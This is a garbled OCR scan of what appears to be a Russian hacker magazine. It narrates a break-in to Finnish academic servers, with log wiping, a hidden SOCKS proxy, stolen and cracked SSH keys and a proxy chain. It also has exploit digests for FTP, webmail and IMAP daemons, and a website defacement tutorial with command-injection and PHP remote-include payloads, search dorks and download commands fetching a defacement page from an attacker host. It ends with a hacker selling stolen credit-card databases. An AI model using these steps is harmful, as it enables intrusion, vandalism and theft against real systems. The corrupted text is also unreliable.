утилиту ѴапізИ2 (ты должен знать про этот 
чудесный клинер). Когда все логи были под- 
чищены, я прочитал файл /ргос/сриіпТо и уз- 
нал, что на этой тачке стоит хороший камень 
частотой 1500 МНі и воткнуто полгигабайта 
памяти. Отлично, тут созданы просто теп- 
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Пишем самопальный парсер 



личные условия для хакерского плацдарма - 
теперь есть где запускать ресурсоемкие 
приложения :). Но это все вопрос будущего, 
сейчас же мне нужно было получить доступ к 
приватному ресурсу ради которого, 
собственно, и была заварена эта каша. 

Л П0П0С0ТЫЕ НОСКИ ПТПК9ЮТ 

В качестве проксика я решил поставить пя- 
тые соксы, чтобы юзать не только прелести 
Ш/ѴѴ, но и другие сервисы. Для этого я ска- 
чал архив (іір.с(1иі.есІи.сп/риЬ/Ііпих/пеіѵѵогк/$егѵег/ 
$оск$5/$оск$5-ѵ1.0г5.іаг.д2). Быстро скомпилив 
зоскз5 в домашний каталог, я оформил кон- 
фиг -/зоскз/еіс/зоскзб. раззѵѵсі, в который 
вписал тестовый логин и пароль для соеди- 
нения. Теперь мне предстояла работа по 
составлению рабочего конфига носков. На 
самом деле достаточно написать всего две 



■Ж* 

л На компакте ты 
найдешь свежие 
соксы, а также ви- 
деоролик, повторя- 
ющий деструктив- 
ные шаги хакера. 

л Не стоит забы- 
вать, что все 
действия хакера 
противозаконны, 
поэтому данная 
статья предостав- 
лена лишь для оз- 
накомления и орга- 
низации правиль- 
ной защиты с твоей 
стороны. За при- 
менение материа- 
ла в незаконных 
целях автор и ре- 
дакция ответствен- 
ности не несут. 



ЧТО П0И0ГП0 КОКЕРУ ПРИ ВЗПОИЕ? 

О. После того, как хакер увидел /еіс/раззѵѵсі, он решил переб- 
рать пары Іодіп:Іодіп. Это решение не было случайностью - ког- 
да на сервере прописано слишком много пользователей, веро- 
ятность совпадающего пароля далеко не нулевая. 

О. Даже самопальный руткит может надолго прикрыть задницу 
хакера. Действительно, зачем ставить полный комплект бинар- 
ников, когда за сервером толком не следят? Можно ограничить- 
ся суидным ЬазП и простым логвайпером. 

Ѳ. Взломщик захотел пощупать и другие серверы в академи- 
ческой сетке. Для этого ему пришлось решить нелегкую задачу: 
найти ргіѵаіе кеу, расшифровать пароль и заюзать ключ для со- 
единения. 



57 





взпом 






ш. 



Устанавливаем носки 

строки, и соксы будут авторизовать юзера 
по заполненному паролю. Строки в 
-/зоскз/еіс/зоскзб . сопТ выглядит следующим 
образом: 

аиііі - - и 
регтіі и 



ВОПШЕБНПЯ СИПП КЛЮЧЕЙ 

И спользовать ключи для соединения гораздо удобнее, чем 
доверяться паролям. Дело в том, что если пользователь 
юзает ключ, никто не сможет соединиться с шеллом с левой ма- 
шины. Исключение описано в этом взломе - если доверенную 
тачку порутал хакер, он легко может соединиться и с другими 
серверами. Именно поэтому пользователи создают ключ, за- 
щищая его так называемой ключевой фразой. Только после ее 
ввода ззИ-клиент получает содержимое ключика. Создать ззМ- 
ключ очень просто. Рассмотрим организацию соединения по 
35 Н 2 ЭВА-ключику. Для этого выполни команду 55 Іі-кеудеп -I 
сіза. Бинарник спросит у тебя парольную фразу и местоположе- 
ние ключей. Когда он закончит свою работу, скопируй содержи- 
мое файла ісМза.риЬ в аи1:Ііоп2есІ_кеуз2 (все операции прово- 
дятся в папке -изег/.ззИ). Теперь переноси публичный ключ и 
аи1:ІіогІ2есІ_кеуз2 на машину, с которой ты будешь соединяться. 
Пожалуй, все. Юзай стандартный клиент ззТі, который соединит 
тебя с удаленным узлом без ввода пароля. 




А К сведению: 
ключи для $$Н бы- 
вают трех типов: 
гзаі для $$Н1 , 
гзаі для $$Н2 и 
Э$А для второй 
версии протокола. 




А Опция --ргеііх, 
переданная скрип- 
ту ./сопіідиге, поз- 
воляет установить 
проект в произ- 
вольный каталог. 



Это означает, что соке будет авторизовать 
юзера по паролю, а также разрешать коннек- 
ты на любые хосты и порты. То, что доктор 
прописал :). Осталось лишь переименовать 
файл -/зоскз/Ьіп/зоскзб во что-нибудь невз- 
рачное и запустить его. 

После того как я заюзал носки, скрипт ус- 
пешно зарегил аккаунт в системе и дал мне 
возможность стащить важные документы. 
Когда главная цель была выполнена, стало 
можно приступать к взлому финской локалки. 

Своруем ключи 

Сперва я запустил тс и стал бродить по 
папкам в поисках ценной информации. Я мо- 
ниторил истории команд, логи ІійрсІ-запро- 
сов, но ничего путного не обнаружил. Мне 
очень хотелось забраться на другие тачки в 
сегменте. Я набрал команду Іосаіе 
кпоѵѵп ііозіз, чтобы узнать, какие юзеры лю- 
бят путешествовать по 88Н-протоколу :). В 
итоге выяснилось, что 4 пользователя юзают 
88Н. Однако ни одного ключика не было 
найдено :(. Внезапно мое внимание привлек 
интересный каталог /тпѴЬаскир. В этой ди- 
ректории располагался бэкап системы. Но 
не того сервера, которым я овладел, а како- 
го-то иного. Разумеется, Іосаіе не ищет фай- 
лы в папке /тпі, поэтому я не знал, находят- 
ся ли файлы с именем кпоѵѵп ііозіз в катало- 
ге с бэкапами. Оказалось, что находятся. 
Прошвырнувшись по домашним каталогам, я 
обнаружил, что у юзера агазііа помимо спис- 
ка хостов имеются и авторизационные клю- 
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чи. Мне хотелось проверить валидность этих 
ключиков для соседних серверов. По всей 
видимости, на этих тачках должны находить- 
ся аналогичные приватные ключи. 

Прежде чем действовать, я аккуратно за- 
бэкапил рабочий каталог .ззИ у юзера агазі- 
іа, и лишь затем перенес туда файлы с дру- 
гой машины. Теперь можно выполнять зи - 
агазііа и соединяться с хостами по ключу. 
Однако меня поджидал крутой облом: кей 
был защищен паролем, который не позво- 
лял соединиться с узлом. 

Но все оказалось не так уж и плохо. Я 
вспомнил, что существуют тулзы, которые 
умеют перебирать пароль 88Н -ключа. Одна 
из них выпущена командой ТИС и находится 
тут: №««.ІІіс.огд/гооіЛооІ$Лііс_$$Іі_сгаск.с. В этой 
софтине юзаются функции 88І_, которые 
пытаются вытащить приватный ключ из 
файла. Если им это не удается, значит, па- 
роль неверный и перебирается другое сло- 
во. Недолго думая, я слил эту тулзу, ском- 
пилил с параметром -ІззІ и запустил пере- 
бор по словарю. К сожалению, брутфорс не 
принес никаких успехов. Но что-то застави- 
ло меня прочитать исходник ісМ ззИ сгаск.с 
и увидеть там рекомендацию по взаимо- 
действию брутфорсера и известного ЭоМп'а 
Тбе Ніррег'а. Дело в том, что Джоник явля- 
ется неплохим генератором паролей, кото- 
рые можно использовать в качестве эталон- 
ных. Эта идея мне очень понравилась, и я 
решил воплотить ее в жизнь. Для этого мне 
пришлось перенести ключ на другой сер- 
вер, где уже стоял Джон, и осуществить 
симбиоз двух брутфорсеров. Строка запус- 
ка выглядела следующим образом: 

ЛоМ -$ісІоиі -іпегешепіаі | піее -10 ,/сгаск ісМ$а 

Команда піее повышает приоритет второ- 
го брутфорсера, что уменьшает время про- 



цесса. Поразительно, но уже через 20 минут 
Джоник подобрал пароль к ключу. Теперь я 
смогу соединиться с другими серверами, 
принадлежащими академии, без знания па- 
роля! К моему счастью, публичный ключ 
действительно находился на другой стороне, 
поэтому я без проблем залогинился на дру- 
гой машине. Там также вертелся ПН 7.2, ви- 
димо, финны очень любят однообразие :). 

На трех порутанных хостах я поставил соксы, 
объединил их в цепь и еще долго пользовал- 
ся ей в своих грязных целях. 

А ИНСТИТУТ -источник 
хппявы 

Взлом серверов академии принес мне боль- 
шую пользу. Дело в том, что все госучреж- 
дения юзают инет на халяву, поэтому я мог 
без проблем прокачивать варез через финс- 
кий сервер. Как выяснилось позже, за маши- 
нами толком никто не следил, они распола- 
гались на стенде для студенческих проектов, 
поэтому юзались лишь для компиляции и 
тестирования исходников. Поэтому мне даже 
не пришлось прикрывать свой ІР-адрес в 
пеІзІаТе и хайдить лишние процессы. ЗС 
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ОРЕИіТРО <= 0.30.1 МЕЗ- 
806Е 8Ѵ8ТЕМ НЕМОТЕ ЗНЕІІ ЕХРЮІТ 

описрние: 



Не так давно мир узнал о новой уязвимости в проек- 
те ОрепРТРО. Этот на первый взгляд защищенный 
демон содержит в себе фатальную ошибку. Брешь 
кроется в исходнике /згс/тізс/шзд.с, который обра- 
батывает сообщения для РТР-пользователей. Для 
эксплуатации достаточно послать длинную и не сов- 
сем корректную мессагу, а затем прочитать ее. Туг же 
у демона сорвет крышу, а при хорошем раскладе за- 
пустится рутовый шелл :). 

Автор эксплойта утверждает, что без проблем зару- 
тал ЗІаскѴѴаге 9.0. Я испытывал эксплойт на старом 
добром РесШ 7.0 и быстро добился успеха. В об- 
щем, судя по моим (и не только) впечатлениям, 
эксплойт действительно что надо. Для того чтобы 
проверить его в действии, тебе понадобится рабочий 
РГР-аккаунт. Остальные параметры (адрес возврата и 
т.п.) можно посмотреть в исходниках эксплойта. 



защита: 



Рекомендуется в срочном порядке обновить 
ОрепРТРО либо установить спасительный патч. Све- 
жий релиз и хотфикс ты можешь найти на официаль- 
ном сайте проекта: ѵѵѵѵѵѵ.орепПрсІ.огд5673/орепАрс|/(Іоѵѵп- 
ІоасІ_раде.1М Кстати, если ты экстремал, никто не ме- 
шает тебе порыться в файле плзд.с и исправить уяз- 
вимость форматной строки самостоятельно, не так 
уж это и сложно :). 



ссыпки: 



Забирай рабочий эксплойт с официального сайта 
журнала (ѵѵѵга1.хакер.ги/розі/23372/ехрІоШ). Не забывай, 
что использовать его нужно только в ознакомитель- 
ных целях! 



злоключение: 



Для правильного взлома злоумышленнику необходим 
полноценный Йр-аккаунг. Я думаю, эксплойт не будет 
пользоваться большой популярностью в хакерском кру- 
гу, но рекомецоую всем дайнам обновитъ ОрепРІРР 
либо вообще отказаться от его использования. 



СНЕЕТ8: 



Эксплойт написали грамотные ребята из группы 
ѵой.аІ. Что касается бат, то ее запатентовал главарь 
банды - Апсіі (апбі@ѵоісШ). 




8І11ЛШІ.МПІІ СНР088Ш0 ^ 
ЮШ К00Т ВШЕГОВСЕ ЕХРЮІТ 

описание: 



Несмотря на слово «ЬгиІеТогсе», это не обычный 
брутфорс, а самый настоящий эксплойт. Баг, 
обнаруженный в сітраззѵѵсі (часть почтового про- 
екта зциіггеітаіі), позволяет получить рутовые 
привилегии. Для этого достаточно добиться вы- 
полнения двух условий: узнать пароль на учет- 
ную запись группы ш/ѵѵ и запустить эксплойт 
под этой записью. Хакерская тулза за несколько 
минут подберет нужный адрес возврата, потом 
стартанется сііраззѵѵсі с успешно подобранным 
адресом. В финальной стадии сИраззѵѵс! ругнет- 
ся на соответствие старого и нового пароля, а 
затем откроет полноценный рутовый шелл. 



защити: 



Баг затаился в самом свежем релизе проекта, так 
что единственным спасением от уязвимости яв- 
ляется удаление ЗдиіггеІтаіІ со своей машины. 
Впрочем, можно поступить проще: для исправле- 
ния бага нужно снять зиісі с бинарника сИраззѵѵсІ. 



ССЫПКИ: 



Дружно скачиваем эксплойт по ссылке 

ѵѵш1.хакер.ги/ро$і/22060/ехрІоШ. Технические 
подробности уязвимости, к сожалению, оста- 
ются в тайне :(. 



злоключение: 



ЗдиіггеІтаіІ достаточно раскручен и установлен на 
многих серверах. Если хакеру удастся поиметь ка- 
кие-нибудь локальные права, ничто не помешает 
ему поднять свои привилегии до максимума. 



СЛЕЕТ8: 



Автором эксплойта является известный хакер 
Вуіез (ВуІез@рІі4пЮт.огд). Среди его творений 
существует и удаленный эксплойт для ЗдиіггеІтаіІ, 
которого пока нет в публичных источниках. 




СОЦШЕВ-ІМПР <= 3.0.2-К1 
НЕМОТЕ В00Т ЕХРЮІТ 

лписпние: 



Опять эксплойт и опять для почтовой системы. На 
этот раз уязвимым признан демон соигіег-ішар, 
который позволяет снимать почту через ІМАР-сер- 
вис. Баг на основе Тогплаі зігіпд был найден в функ- 
ции аіШі_сІеЬид(), а именно в участке кода, где 
проводилась замена непечатных символов. Важ- 
ная функция ргіпй() выводила содержимое пере- 
менной без каких-либо ограничений, что позволя- 
ло переполнить буфер. Для успешной эксплуата- 
ции не нужно знать почтового аккаунта, так как 
функция вызывается до процесса авторизации. 
Для использования эксплойта нужно изменить 
хост в исходнике (по умолчанию там забит ІосаІ- 
Ііозі), а затем запустить без параметров. Если вер- 
сия демона действительно уязвима, бинарник ус- 
пешно запустит рутовый /Ьіп/ЬазИ. Я тестировал 
эксплойт на Фряхе 4.7 с версией курьера 3.0.2 и 
легко добился желаемого результата. 




Эксплойт выложен на твоем любимом сайте 

(шѵшкер.ги/ро$і/23704/ехрІоіШі). За технической 
документацией обращайся по адресу ѵѵѵѵѵѵ.зесигі- 
іу.ппоѵ.ги/зеагсІі/сІоситепіазр?сІосісІ=6624. 



злоключение: 



Ничто не мешает хакеру создать специальный 
авторутер, который будет тестировать тысячи 
ІМАР’ов на уязвимость. ИМХО, после такой про- 
верки хакер получит десятки дырявых хостов, 
ибо далеко не все админы следят за своими 
почтовыми демонами ;). 



ЛНЕЕТЗ: 



Опять рабочий эксплойт и опять от ІШЕРЕІМСЕ. 
Эта хакерская группа подарила миру очень 
много хороших вещей. И я думаю, сплойт для 
соигіег-іплар не последний их шедевр. 




















□ нам приходит очень много писем и 8113-сообщений, в которых вы спрашиваете: «Как взпомать сайт?». Ответить на такой вопрос в 
формате 8И8 невозможно, поэтому мы решили сделать специально дпп тебл материал, в котором расскажем об основных приемах 
дефейса. Прочитав эту увлекательную статью, ты узнаешь об известных багах в ССІ/РНР-сценариях и научишься грамотно их 
эксплуатировать. Я не забуду упомянуть о методах поиска ошибок, а также о собственной безопасности. Итак, начинаем! 



ПИКБЕЗ ПО СОВЕРШЕНИЮ ПЕФЕЙСОВ 



А 



А ОШИБКИ БЫВПЮТ РОЗНЫЕ 

Н у что ж, понеслась! Как и обе- 
щал, приведу небольшой об- 
зор самых популярных Ш/ѴѴ- 
багов, через которые ты мо- 
жешь влегкую замутить де- 
фейс. Практически все они 
позволяют получить на ломае- 
мом проекте полноценный 
ѵѵеЬ-шелл. Задефейсить после этого іпбех- 
страницу не составляет большого труда. 

О. ССІ::ореп(). 

Итак, первая ошибка заключается в не- 
верном использовании функции ореп() в 
перловых ССІІ-скриптах. Баг эксплуатирует- 
ся, когда хакер запрашивает нестандартный 
параметр у сценария. Характерным призна- 
ком присутствия ошибки является название 
опции, передаваемой скрипту. Если пара- 




метр называется ТМе, йіепате, аііісіе, ісі и 
т.д., можешь быть уверен - сценарий уяз- 
вим. Попробуй изменить значение парамет- 
ра на |ісІ, ісІ| или |іб|. В случае, когда скрипт 
выведет текущие права пользователя (смот- 
ри скриншот), можешь прыгать до потолка - 
по всей видимости, сегодня благоприятный 
день для дефейса :). Убедись, что команды, 
состоящие из двух слов, также работают 
исправно. Для этого скомандуй, например, 
ипате -а. Не забывай про обрамление вер- 
тикальными палочками (пайпами) - именно 
из-за них баг в ореп() проявляется в выводе 
скрипта. Часто бывает, что команда, включа- 
ющая пробел, не выполняется. В этом слу- 
чае необходимо заменить все пробельные 
символы на переменную $ІР5, только тогда 
команда исправно переварится сервером. 
Посмотри на скриншот и все поймешь без 
лишних вопросов. 

О. ССІ::ореп()::ЫиІІ-ЬуІе 
(тупиковый баг). 

Следующая уязвимость не является крити- 
ческой и не ведет к исполнению команд, поэ- 
тому максимум пользы, которую ты можешь 
извлечь из обработки нулевого байта, - зати- 
рание іпбех.МтІ. Имена параметров, указы- 
вающих на брешь, остаются такими же, как в 
первом случае. Отличие от первого бага в 



том, что запрос скрипту будет включать имя 
файла с нулевым байтом в конце (символ 
%00). Как ты понимаешь, кроме чтения фай- 
ла, скрипткидис ничего не добьется. Но иног- 
да документ можно обнулить, а ведь это тоже 
своего рода дефейс! Чтобы воспользоваться 
перезаписью іпбех.МтІ, после указания пути 
к іпбех.МтІ поставь символ >, и посетители 
портала будут лицезреть пустой іпсіех. 

ССІ::зузІет() и РНР::зуз1ет(). 

Ошибки в системных функциях очень 
просты для понимания. В ряде случаев ад- 
мины обращаются к функции, выполняющей 
системные команды. При этом они подстав- 
ляют в эту функцию переменные, приходя- 
щие извне, безо всякой проверки. Если по- 
исковая система нашла для тебя странный 
скрипт, принимающий опцию тап, которая 
имеет значение, к примеру, рз, у тебя есть 
шанс протестировать сценарий на систем- 
ный баг. Обрами значение параметра сим- 
волом «;» с обеих сторон, а в середине на- 
пиши команду. Пусть это будет уже знако- 
мое слово ісі. Представь: твоя команда попа- 
дает в зузІет(), слово тап игнорируется (в 
связи с отсутствием запрошенного мануала), 
а вот /изг/Ьіп/ісІ выполнится без вопросов. В 
итоге ты будешь наблюдать свои права в ок- 
не браузера. Эта ошибка характерна как для 
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ДЕФЕЙС ПО-ПРПВИПЬНОНУ! 



искусство поиска 

К ак я уже сказал, любой скрипткидис начинает с поиска баж- 
ного сайта. Для этого существует целых два приема. Вкрат- 
це расскажу о каждом из них. 



Сіт іі* 



к 






Первый заключается в использовании поисковых машин. На 
мой взгляд, лучшей поисковой системы, чем Соодіе, еще не 
придумали. Поэтому стоит пользоваться только его услугами. В 
качестве поисковой строки задавай нечто похожее на 
ТіІеІуре:сді ТіІепапле=. Эта строчка поможет найти бажный ССІ 
скрипт с некорректным параметром ореп(). Как ты понял, 

подстроку ТМе- 
папле можно за- 
менить на слово 
ТМе, агіісіе и т.п. 
Если ты задашь 
параметр ПІллІ, 
то увидишь сце- 
нарии, подклю- 
чающие стати- 
ческие ИІтІ -до- 
кументы. Это 
также очень по- 
лезно. Не забы- 
вай, что перло- 
вые скрипты час- 
то имеют расши- 
рение .рі, их то- 
же нужно проверить на баги. Если хочешь найти уязвимый рПр- 
сценарий, используй директиву ТМе1:уре:рПр, а также кейворд 
ИШлІ. Когда есть желание отдефейсить сайт из определенной 
страны, на помощь приходит конструкция зііещомен. Все наст- 
ройки Гугла ты можешь посмотреть на странице 
ѵѵѵѵѵ\лдоодІе.ги/ргеТегепсе5?Ы=ги. И еще одна поисковая хит- 
рость: когда скрипткидису становится известно о баге в движке, 
он ищет этот движок по всему инету, набрав в строке поиска его 
название и релиз. 






Оцени прелести Гугла! 



Второй способ заключается в сканировании. Существует масса 
сканеров Ѵ\ММ/- каталогов на предмет бажных сценариев. Один 
из них - сез.рі - перловая утилита, помогающая определить 
местоположение дырявого сценария (Шр://катеп5к.пеІ.ги/ 
{огЬ/1 /х/аиІогооѴсез.-Іаг.дг). Необходимо лишь своевремен- 
но обновлять базу сканера при помощи сайтов, посвященных 
безопасности. 




ОСИ, так и для РНР, поэтому можешь тестить 
на баг оба интерпретатора. 

О. РНР::іпсЫе(). 

И наконец, я не могу не описать самую 
популярную ошибку РНР-приложений - 
брешь в функции іпсіисіе. На самом деле ни- 
какой бреши тут нет - іпсІисІе() подключает 
произвольный файл и обрабатывает его ин- 
терпретатором. Но при неграмотной наст- 
ройке рМр.іпі можно подключить файл, нахо- 
дящийся на другом сервере, и обработать 
его в бажном скрипте. 

Для этого тебе понадобится сделать два 
простых шага. Во-первых, зарегиться на 
бесплатном хостинге (на пагосі.ги, например), 
а затем залить туда несложный РНР-скрипт 
(смотри таблицу). Во-вторых, подставить в 
параметр исследуемого скрипта значение в 
виде ссылки на свежезалитый сценарий и 
добавить лишнюю переменную стсі, выпол- 
няющую произвольный код на сервере. Да, я 
забыл сказать, что характерным признаком 
ошибки является значение параметра в виде 
аДісІе.МтІ, Ііпкз, Тац, 1 1222.аг1 и т.п. В об- 
щем, когда налицо юзание статических доку- 
ментов в динамическом скрипте, будь уве- 
рен - баг где-то рядом! 

<?рІір 

ра$$ІІіги $сгті(] 

?> 

Л ОПЕРОЦИЯ «ОЕРПСЕ» 

Итак, ты нашел нужный баг и проверил исп- 
равность выполненных команд. Пора присту- 
пать к самому основному шагу скрипткидиса 
- дефейсу. Надо сказать, строка «НаскесІ Ьу 
Ѵазуа» не произведет на посетителей никако- 
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АѴегТѴ Зіисііо 307 

просмотр и запись ТѴ и видео 
чипсет РЫІірз 8АА7134Ш 
поддержка ІМІСАМ стерео 
приём УКВ/РМ радиостанций 
русифицированный интерфейс 



АѴегТѴ ІІЗВ2.0 

■ просмотр и запись ТѴ и видео 

■ ТітеЗЫК и работа по расписанию 

■ подключение и питание по шине 118В 

■ русифицированный интерфейс 

■ компактный эстетичный дизайн 



СМОТРИ 

СЛУШАЙ 

ЗАПИСЫВАЙ! 



АѴегТѴ Вох5 І_іѵе 



Просмотр ТѴ на экране ОРТ или 
І_СЭ мониторов 
Приём эфирных и кабельных 
каналов ТѴ 

Гибкая настройка и сортировка 
телевизионных программ 
Дополнительные входы для 
подключения внешних устройств 
Полноэкранный режим работы 
Разрешение до 1024x768 75Гц 
Прогрессивная развёртка 
ЗО-плоііоп абарііѵе беіпіегіасе 
технология 
Инфракрасный пульт 
дистанционного управления 
Экранное меню 
на русском языке 
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АНТАРЕС 



748-7111 

ѵѵѵѵѵѵ.апіагез.ги 
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л Посещай сайты 
по безопасности, и 
всегда будешь 
знать о багах в 
скриптах и раскру- 
ченных движках. 

Ц§і- 

а Не стоит забы- 
вать, что все 
действия хакера 
противозаконны, 
поэтому данная 
статья предназна- 
чена лишь для оз- 
накомления. За 
применение мате- 
риала в незаконных 
целях автор и ре- 
дакция ответствен- 
ности не несут. 

л Элитный масс- 
дефейсер и сканер 
ѴѴеЬ-уязвимостей 
ждут тебя на на- 
шем диске. 



го впечатления, наоборот, Васю закидают 
гнилыми помидорами. Дефейс надо делать 
умеючи. Я даже не буду перечислять основ- 
ные части хакнутого іпбех.ійті - зайди на ка- 
кое-нибудь зеркало и зацени дефейсы гра- 
мотных взломщиков. Моя задача - научить те- 
бя заливать подобные творения на удаленный 
сервер и грамотно их «инсталлировать» :). 

В первую очередь, убедись, что команды 
с пробельным символом исправно выполня- 
ются сценарием. Это мы уже проходили. Ес- 
ли все в порядке, можно приступать к анали- 
зу прав, который покажет, быть дефейсу или 
не быть :). Сравни собственные права с при- 
вилегиями на ѵѵеЬ-папке. Для этого выполни 
две команды: ісі и Із -Іаб (с учетом того, 
что скрипт находится в корне /сді-Ьіп). Если 
тебе трудно найти корень ѴѴШ, узнай теку- 
щий каталог запросом рѵѵсі, а затем посмот- 
ри листинг каталога с именем ійті, ійбосз и 
т.п. В нем и должен находиться заветный 
іпбех.ійті. Впрочем, если сайт динамичес- 
кий, то расширение у іпбех может быть и 
сді, и рМр. В ряде случаев первая страница 
вообще не засветится в строке адреса. На 
помощь придет команда саі /путь/к/предпо- 
лагаемому/іпсіех. Если выведенная инфор- 
мация будет похожа на контент главного 
файла - будь уверен, именно этот документ 
и нужно подменить. Важно, чтобы иісі или 
дісі, прикрепленные к файлу, совпадали с 
выводом ісі. Только в этом случае система 
позволит заменить содержимое іпсіех. К 
счастью для скрипткидиса, в 80 % случаев 
права совпадут, так что надейся и верь, что 
тебе повезет :). 

Следующий шаг заключается в поиске 
программы для скачивания внешних файлов. 
Я уверен, что помимо скучного контента 
іпсіех. Ійті тебе захочется добавить красивую 
картинку, элитный іаѵазсгірі или даже ап- 
плет. Все они должны быть залиты со сто- 
роннего сервера. Для того чтобы стянуть все 
необходимые документы, воспользуйся од- 
ной из следующих утилит: Іупх, Ііпкз, ѵѵдеі, 
ТеІсМ , сигі или СЕТ. Определить местополо- 
жение той или иной программы поможет ко- 
манда «ѵѵііісіі имя». Синтаксис вышеуказан- 
ных тулз смотри в специальной врезке, ду- 
маю, с этим вопросом у тебя проблем не 
возникнет. Выкачивай последовательно все 
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| Не правда ли, красиво? 



СИНТПКСИЧЕСКИЕ ПРПВИПО 



К аждая программа-качалка имеет свой синтаксис. Любой 
скрипткидис обязан знать его, чтобы успешно сливать 
подложные документы из темного уголка Сети. Посмотри и 
запомни синтаксис шести качалок, которыми аплоадится 
хакерский іпсІех.ИІтІ. 

І_упх: Іупх -зоигсе "ИНр://Иаск.пагосІ.ги/сІе^асе/іпсІех.ИІтІ" > 
Дтр/сІе^асе/іпсІех.ИІтІ 

Ыпкз: аналогично Іупх. 

ѴѴдей ѵѵдеі -О Дтр/сіе*асе/іпсІех.ІіІтІ ННр://Наск.пагосІ.ги/ 
сІеТасе/іпсІех. ПітІ 

СЕТ: СЕТ ННр://Насктагосі.ги/сІеТасе/іпс]ех.№тІ > Дтр/ 
сіеіасе/іпеіех. Мт! 

Реісіі: іеХси -о Дтр/сІе*асе/іпсІех.МтІ ННр://Наск.пагосІ.ги/ 
сіеіасе/іпеіех. Мт! 

Сигі: сигі --оиіриі /Ітр/сІеіасе/іпсІех.МтІ 

МІр://Наск. пагосі . ги/сіеіасе/іпсіех. МтІ . 



хакерские файлы в каталог Дтр и морально 
готовься к замене главной страницы - ты 
очень близок к этому шагу. 

Предположим, что ты не нашел ни одной 
качалки на сервере. Такое тоже бывает. В 
этом случае можно воспользоваться обыч- 
ным Йр-клиентом, предварительно наколба- 
сив для него небольшой сценарий. Допус- 
тим, что все документы для дефейса нахо- 
дятся на бесплатном хостинге в каталоге 
бекасе. Твоя задача - слить их все в директо- 
рию Дтр/беТасе. Выполни все команды, ука- 
занные ниже, и необходимые документы без 
проблем сольются во временный каталог. 



РТР-сценарий для убогого сервера :) 



есііо и$ег и$ег ра$$ѵѵогс! > /ітр/Гір 
есііо рготрі оГГ » /ітр/Гір 
есііо іуре Ьіпагу » /ітр/Гір 
есііо Ы /ітрМеіасе » /ітр/Гір 
есііо тдеі беГасе/* * »/ітр/Гір 
есііо диіі » /ітр/Гір 
Гір -п Ііаск.пагоб.ги < /ітр/Гір 
гт ті /ітр/Гір 

Сначала авторизуемся на сервере. Затем 
отключаем интерактивные вопросы и уста- 
навливаем бинарную передачу. Потом захо- 
дим в локальный каталог Дтр/беГасе и выка- 
чиваем все файлы из папки бекасе на уда- 
ленном сервере. Остается лишь попрощать- 
ся с сервером и выполнить мощный сцена- 
рий клиентом Йр (опция -п позволяет поме- 
щать логин и пароль в одну строку). Не за- 
будем удалить временный скрипт, зачем 
посвящать админа в нелегкое хакерское 
мастерство? Может случиться и самая груст- 
ная ситуация, когда на сервере отсутствует 
Йр-клиент, установлен файрвол, либо клиент 
не понимает опции -п. В этом случае придет- 
ся юзать команду есію с перенаправлением в 
іпбех.ійті. Получится не очень красиво, зато 
ты получишь отличный шанс самоутвердить- 
ся за чужой счет :). Впрочем, есть мастера, 
которые одним есію'м могут наколбасить ха- 
керский шедевр :). Все в твоих руках, нужно 
лишь немного знать язык разметки. 

И наконец, самое главное. Перед тем как 
заменять главную страницу, сохрани ее ко- 



пию. Этому правилу подчиняются даже са- 
мые кровожадные скрипткидисы. Ведь для 
кидиса основная цель - изменить іпбех.ійті, 
а не стирать к черту весь вебовский контент. 
Поэтому перед выполнением команды ср -В 
Дтр/беГасе/* /раіііДо/ѵѵеЬ/, обязательно ско- 
пируй іпбех.ійті в іпбех.ійті. оіб. 

А 0 ЧТО ПОТОМ? 

Вот, собственно, и все. Алгоритм работы де- 
фейсера виден сразу: вначале скрипткидис 
ищет нужный баг, затем эксплуатирует его 
до заветного командного шелла, генерирует 
іпбех.ійті, заливает его на поверженный 
сервер, а затем переносит свое творение в 
папку с ійті-документами (с предваритель- 
ной проверкой прав). Далее начинается са- 
мое интересное - скрипткидис замеряет вре- 
мя. Ему ужасно интересно, сколько минут, 
часов или дней его шедевр продержится на 
раскрученном портале. Кидис обязательно 
сделает зеркало, на которое вывесит скрин- 
шот или сам іпбех.ійті. Впоследствии он 
может опубликовать свою работу на различ- 
ных сайтах, например, на ѵѵѵшакер.ш. 

Обычно хакер страдает манией дефейса 
около года. Если человек обладает целеуст- 
ремленностью, он обязательно заинтересу- 
ется искусством локального взлома. Когда 
это произойдет, он ни за что не поменяет 
главную страницу сайта. Взломщик будет 
искать пути получения гсхй-привилегий, соз- 
давать хакерский плацдарм для вражеских 
флуд-ботов и т.п. ЦП 
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И не часто приходится сталкиваться с нелегкой работой, лацепенной на добычу секретной информации из закрытых источников. За 
время работы мне доводилось выпоплять самые разные задачи, поэтому я не удивпюсь, если завтра меля наймут для сбора 
компромата на известного политика или кражи чертежей нового аппарата для переработки коровьих фекалий. 9 меня накопился 
огромный опыт в этой сфере, и я хочу им с тобой поделиться. Я расскажу тебе о том, как грамотно отыскать, отсортировать, а затем 
незаметно утянуть доки под грифом «Совершенно секретно». 



метопы поиска и кражи секретной информпции 



ой рассказ не сделает тебя 
грамотным хакером - нюх на 
интересную инфу вырабаты- 
вается с годами. Я просто 
хочу рассказать тебе о соф- 
те и методах, которыми я 
пользуюсь. Уверен, что пос- 
ле прочтения статьи ты отк- 
роешь для себя много нового и интересного. 
Во всяком случае, я очень на это надеюсь. 

А КОМУ НУЖНЫ эти доки? 

Раз уж мы заговорили о сборе, пора бы вы- 
яснить, кому и зачем нужна сокровенная ин- 
формация. Случаи бывают разными. Как-то 
раз мне пришлось хакнуть на заказ один ма- 
лоизвестный портал в Колорадо. Заказчика 
интересовала база данных, находящаяся на 
сервере. В БД не было ничего сверхсекрет- 
ного, лишь имена, фамилии, адреса и номе- 
ра кредиток. Однако база очень понравилась 
моему клиенту-кардеру, и он щедро отблаго- 
дарил меня зелеными президентами. Прош- 
ло несколько месяцев, и ко мне обратился 
еще один виртуальный заказчик. Его интере- 
совали сведения о последних достижениях в 
нанотехнологиях. Он даже дал мне список 
ключевых слов, по которым нужно было ис- 
кать серверы. Я нашел пару дырявых машин, 




взломал их и наткнулся на множество доку- 
ментов. Некоторые из них весили десятки 
метров, поэтому сливать их все было до- 
вольно накладно и нецелесообразно. Целых 
два дня я трудился над сортировкой и скачи- 
ванием нужных доков, однако мои ожидания 
не оправдались, и ко мне на винт попал 
сплошной хлам и мусор, который не заинте- 
ресовал заказчика :(. 

Я до сих пор периодически достаю со 
взломанных серверов различные приватные 
данные. Так, для временного хранения, чтобы 
потом сбыть информацию за несколько сотен 
зеленых. Но теперь я ни за что не поставлю 
на скачивание неизвестный документ. Прежде 
чем инфа попадает на мой комп, она прохо- 
дит несколько сложных стадий проверки на 
секретность. В целях экономии времени и 
трафика исследования материалов проводят- 
